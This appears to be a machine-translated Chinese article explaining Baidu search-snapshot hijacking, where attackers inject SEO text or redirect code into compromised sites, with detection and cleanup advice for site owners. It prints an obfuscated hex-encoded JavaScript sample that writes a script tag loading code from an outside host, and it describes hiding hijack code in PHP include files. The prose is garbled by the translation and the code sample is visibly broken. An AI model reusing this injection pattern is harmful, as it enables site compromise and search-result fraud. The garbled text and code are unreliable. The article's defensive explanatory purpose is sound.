当前位置 主页 > 本站WEB程序 > 安全 > IIS7网站监控 >
什么是快照劫持及解决办法
最近,朋友们经常会一些莫名其妙的搜索关键词来到网站装修站,第一感觉是被攻击,但也看不出什么异样,只是在快照中显示的主要域名标题是另一个菠菜站。这初步怀疑是百度快照劫持,首先明白什么是快照劫持。
百度快照劫持是指黑客通过技术手段获取你的网站的FTP权限或数据库权限,植入代码或添加劫持脚本,将自己想要的内容写入页面代码,并在首页的标题标签下调用。当搜索引擎访问你的网站时,它会抓取你网站的标题-关键词-描述,还会抓取黑客设置的任何内容!
一般使用站点命令来查看百度快照,如网站:qhdseo.net
如果你看到标题和描述与你写的不同,你可以判断黑客劫持了快照。了解常见的劫持方法,防患于未然,确保网站的安全。
除了找到百度来解决问题,还需要搜索和修复其网站,以避免再次受到攻击。
首先,把它放进去;头部;标签
在网站设计方面;头部;标签中有标题、描述、关键词和其他内容。这部分显然是写好的。如果它写在生成的静态主页html文件中,主页将在每次更新时消失。但是,如果很快再次修改,它可能会被其他特洛伊木马程序定期修改。应该注意找出答案。
以DedeCMS为例,一些文件夹被禁止执行脚本,所以可以修改的文件必须在可以执行的文件夹中。如果你不熟悉文件结构,你可以通过与官方文件夹比较来找出问题。
(2)伪装JS文件和修改PHP文件
你一定经历过。例如,如果您使用{dede:global.cfg_poweby/},您将添加自己的梦想编织链接。下载的模板将在友好链接中包含模板开发者的友好链接。这些链接在模板中是不可见的,每次刷新的位置都不同。
应该注意的是,浏览器不能识别JS脚本。如果您在JS中插入链接,您将看不到源代码中的特定内容。事实上,这种方法并不先进,比如常见的:
;脚本src =;../include/js/jq.js。语言=;javascript类型=;文本/JavaScript;;;/script。
js文件包含如下代码:
var _ $ =[;\ x3c \ x73 \ x63 \ x72 \ x69 \ X70 \ x74 \ x20 \ x73 \ x72 \ x63 \ X3D \ x68 \ x74 \ x74 \ X70 \ x3a \/\/\ x77 \ x77 \ x77 \ x7a \ x62 \ x33 \ x36 \ x30 \ x2e \ x74 \ x6b \/\ x69 \ x6d \ x61 \ x67 \ x65 \ x2e \ x67 \ x69 \ x3e];
document . write ln(_ $[0]);
第一句是通过加密代码,第二句输出内容,一般服务器做特殊处理,可以输出正确的内容,所以应该有一些PHP文件。
PHP有许多内置的编写方法,例如/include文件夹,它在没有人注意到的情况下将劫持代码添加到核心PHP文件中。
上述方法很常见。通用CMS具有一定的保护能力。只要不泄露自己的数据库和服务器密码,这些问题就可以及时解决。
3.你已经成为一名黑客;肉鸡;
肉鸡;也许许多人不太理解它。坦率地说,服务器和数据库已经被黑客获得,或者他们已经获得了修改权。
百度有主动提交(投诉)快照的功能。黑客可以在夜间无人值守的情况下秘密修改模板文件,生成主页后向百度提交网址,然后恢复原貌。
快照劫持摘要
黑客可以通过劫持代码劫持百度快照,这是黑帽搜索引擎优化的早期技术。通过劫持webshell网站,他们可以实现自己的网站排名。主要功能是更改webshell网站的快照,使其快照显示为您设置的快照。此时,对方的网站快照(包括标题、关键词和描述)将成为您的。
代码通过实现快照变成你的,当然,排名也变成你的。内置跳转代码,每次你点击搜索引擎,网站就会跳转到其他网站。这是百度快照劫持的原理和更先进的301重量劫持技术!